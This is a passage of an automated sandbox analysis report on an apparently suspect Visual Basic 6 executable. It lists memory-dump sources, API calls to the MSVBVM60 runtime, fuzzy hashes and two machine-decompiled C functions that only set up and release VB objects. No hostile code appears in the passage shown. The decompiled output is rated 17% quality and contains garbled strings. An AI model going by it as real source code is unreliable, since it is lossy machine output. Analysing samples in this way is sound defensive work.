                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: __vba$CheckFreeHresult$CopyNew2
                              • String ID:
                              • API String ID: 3978771648-0
                              • Opcode ID: 0eb5118b17076e7658f81e19bd9cbd9d74da77b762ecabea7499860d38b4443c
                              • Instruction ID: 6168a3b14b59dde415c7b2d06f95efb231dce5ff45abc9e6a2ff6065f135e530
                              • Opcode Fuzzy Hash: 0eb5118b17076e7658f81e19bd9cbd9d74da77b762ecabea7499860d38b4443c
                              • Instruction Fuzzy Hash: 07117270D40209EBCB04DF94DD8AEEEBBB8FB58705F108126F501B71A0D7B86585CBA8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaNew2.MSVBVM60(0040C6EC,Xs,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 004118F4
                              • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 0041190D
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C240,00000134), ref: 00411950
                              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00411959
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: __vba$CheckFreeHresultNew2
                              • String ID: Xs
                              • API String ID: 1645334062-372796199
                              • Opcode ID: f25745c29950f4e03f85561bb9808069391c2c4fa9c6cfb27c85b5a35b79d95f
                              • Instruction ID: 0f55bba0c738c00b82079899f206b619edd8583713f443ae4380c16875773979
                              • Opcode Fuzzy Hash: f25745c29950f4e03f85561bb9808069391c2c4fa9c6cfb27c85b5a35b79d95f
                              • Instruction Fuzzy Hash: A81163B5A00204DBC710DF98C989B9ABBF8FF4C700F10856AF645E7264D7789981CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 17%
                              			E004117E0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                              				char _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				char _v28;
                              				intOrPtr* _t12;
                              				intOrPtr* _t14;
                              				intOrPtr* _t16;
                              				void* _t17;
                              				intOrPtr* _t26;
                              				void* _t27;
                              				void* _t29;
                              				intOrPtr _t30;
                              
                              				_t30 = _t29 - 0xc;
                              				 *[fs:0x0] = _t30;
                              				_v16 = _t30 - 0x14;
                              				_v12 = 0x4012b8;
                              				_v8 = 0;
                              				_t12 = _a4;
                              				 *((intOrPtr*)( *_t12 + 4))(_t12, __edi, __esi, __ebx,  *[fs:0x0], 0x401316, _t27);
                              				_t14 =  *0x413010; // 0x73e858
                              				_v28 = 0;
                              				if(_t14 == 0) {
                              					__imp____vbaNew2(0x40c6ec, "X�s");
                              					_t14 =  *0x413010; // 0x73e858
                              				}
                              				_t16 =  &_v28;
                              				__imp____vbaObjSet(_t16,  *((intOrPtr*)( *_t14 + 0x338))(_t14));
                              				_t26 = _t16;
                              				_t17 =  *((intOrPtr*)( *_t26 + 0xc4))(_t26);
                              				asm("fclex");
                              				if(_t17 < 0) {
                              					__imp____vbaHresultCheckObj(_t17, _t26, 0x40c32c, 0xc4);
                              				}
                              				__imp____vbaFreeObj();
                              				_push(0x41188a);
                              				return _t17;
                              			}
                              0x004117e3
                              0x004117f2
                              0x004117ff
                              0x00411802
                              0x0041180b
                              0x0041180e
                              0x00411814
                              0x00411817
                              0x0041181e
                              0x00411821
                              0x0041182d
                              0x00411833
                              0x00411833
                              0x00411842
                              0x00411846
                              0x0041184c
                              0x00411851
                              0x00411857
                              0x0041185b
                              0x00411869
                              0x00411869
                              0x00411872
                              0x00411878
                              0x00000000

                              APIs
                              • __vbaNew2.MSVBVM60(0040C6EC,Xs,?,?,?,?,?,?,?,00401316), ref: 0041182D
                              • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00401316), ref: 00411846
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C32C,000000C4,?,?,?,?,?,?,?,00401316), ref: 00411869
                              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00401316), ref: 00411872
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: __vba$CheckFreeHresultNew2
                              • String ID: Xs
                              • API String ID: 1645334062-372796199
                              • Opcode ID: 853fbac6c64cfb274fa6564db1b32932e8e915cbbbcbc512635da73859d9a957
                              • Instruction ID: e1be241d3ec618004f9a4f585cad916155cd32e4e93ec53cb64d604b93e2ea91
                              • Opcode Fuzzy Hash: 853fbac6c64cfb274fa6564db1b32932e8e915cbbbcbc512635da73859d9a957
                              • Instruction Fuzzy Hash: 9B113074940204EBC710EF95CD89F9ABFBCFB48701F108566F545E32A0D7789985CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 17%
                              			E004109F0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                              				char _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				char _v28;
                              				intOrPtr* _t12;
                              				intOrPtr* _t14;
                              				intOrPtr* _t16;
                              				void* _t17;
                              				intOrPtr* _t26;
                              				void* _t27;
                              				void* _t29;
                              				intOrPtr _t30;
                              
                              				_t30 = _t29 - 0xc;
                              				 *[fs:0x0] = _t30;
                              				_v16 = _t30 - 0x14;
                              				_v12 = 0x4011d8;
                              				_v8 = 0;
                              				_t12 = _a4;
                              				 *((intOrPtr*)( *_t12 + 4))(_t12, __edi, __esi, __ebx,  *[fs:0x0], 0x401316, _t27);
                              				_t14 =  *0x413010; // 0x73e858
                              				_v28 = 0;
                              				if(_t14 == 0) {
                              					__imp____vbaNew2(0x40c6ec, "X�s");
                              					_t14 =  *0x413010; // 0x73e858
                              				}
                              				_t16 =  &_v28;
                              				__imp____vbaObjSet(_t16,  *((intOrPtr*)( *_t14 + 0x2fc))(_t14));
                              				_t26 = _t16;
                              				_t17 =  *((intOrPtr*)( *_t26 + 0x1b8))(_t26);
                              				asm("fclex");
                              				if(_t17 < 0) {
                              					__imp____vbaHresultCheckObj(_t17, _t26, 0x40c2d0, 0x1b8);
                              				}
                              				__imp____vbaFreeObj();
                              				_push(0x410a9a);
                              				return _t17;
                              			}

                              APIs
                              • __vbaNew2.MSVBVM60(0040C6EC,Xs,?,?,?,?,?,?,?,00401316), ref: 00410A3D
                              • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00401316), ref: 00410A56
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C2D0,000001B8,?,?,?,?,?,?,?,00401316), ref: 00410A79
                              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00401316), ref: 00410A82
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: __vba$CheckFreeHresultNew2
                              • String ID: Xs
                              • API String ID: 1645334062-372796199
                              • Opcode ID: b63715c82151cf0ace84fd9a9ff5c75f9f22e2b23a17b2c91d560c3fa2009605
                              • Instruction ID: 242bca1f2000c737d0e60261897df8eb5ecf9bf14e91775128d24783151d3355
                              • Opcode Fuzzy Hash: b63715c82151cf0ace84fd9a9ff5c75f9f22e2b23a17b2c91d560c3fa2009605
                              • Instruction Fuzzy Hash: CB117C74A40204EBC710DFA5C949F9ABFBCAF58741F204566F545E36A0C7B89981CB98
                              Uniqueness

                              Uniqueness Score: -1.00%